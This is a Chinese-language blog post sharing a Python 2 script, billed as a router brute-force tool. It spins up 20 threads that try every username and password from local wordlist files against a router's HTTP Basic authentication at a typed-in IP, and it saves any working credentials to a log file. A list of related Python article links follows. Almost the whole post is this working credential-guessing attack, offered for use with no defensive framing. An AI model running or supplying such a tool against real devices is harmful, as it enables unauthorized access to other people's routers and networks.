python实现多线程暴力破解登陆路由器功能代码分享,python多线程
python实现多线程暴力破解登陆路由器功能代码分享,python多线程
运行时请在其目录下添加user.txt passwd.txt两文件。否则会报错。程序没有加异常处理。代码比较挫.....
#coding:utf-8-
import base64
import urllib2
import Queue
import threading,re,sys
queue = Queue.Queue()
class Rout_thread(threading.Thread):
def __init__(self,queue,passwd):
threading.Thread.__init__(self)
self.queue=queue
self.passwordlist=passwd
def run(self):
self.user=queue.get()
for self.passwd in self.passwordlist:
request = urllib2.Request("http://"+target)
psw_base64 = "Basic " + base64.b64encode(self.user + ":" + self.passwd)
request.add_header('Authorization', psw_base64)
try:
response = urllib2.urlopen(request)
print "[+]Correct! Username: %s, password: %s" % (self.user,self.passwd)
fp3 = open('log.txt','a')
fp3.write(self.user+'||'+self.passwd+'\r\n')
fp3.close()
except urllib2.HTTPError:
print "[-]password:%s Error!" % (self.passwd)
if __name__ == '__main__':
print '''
#######################################################
# #
# Routing brute force tool #
# #
# by:well #
# #
#######################################################
'''
passwordlist = []
line = 20
threads = []
global target
target = raw_input("input ip:")
fp =open("user.txt")
fp2=open("passwd.txt")
for user in fp.readlines():
queue.put(user.split('\n')[0])
for passwd in fp2.readlines():
passwordlist.append(passwd.split('\n')[0])
#print passwordlist
fp.close()
fp2.close()
for i in range(line):
a = Rout_thread(queue,passwordlist)
a.start()
threads.append(a)
for j in threads:
j.join()
相关内容
- Python Web框架Flask信号机制(signals)介绍,flasksignals
- Python实现检测服务器是否可以ping通的2种方法,pythonp
- Python读取ini文件、操作mysql、发送邮件实例,
- Python中urllib2模块的8个使用细节分享,pythonurllib2
- Python中optparse模块使用浅析,pythonoptparse
- Python连接mssql数据库编码问题解决方法,pythonmssql
- Python模拟登录12306的方法,python模拟12306
- python执行shell获取硬件参数写入mysql的方法,pythonmysql
- Python 抓取动态网页内容方案详解,python动态网页
- 简单使用Python自动生成文章,
评论关闭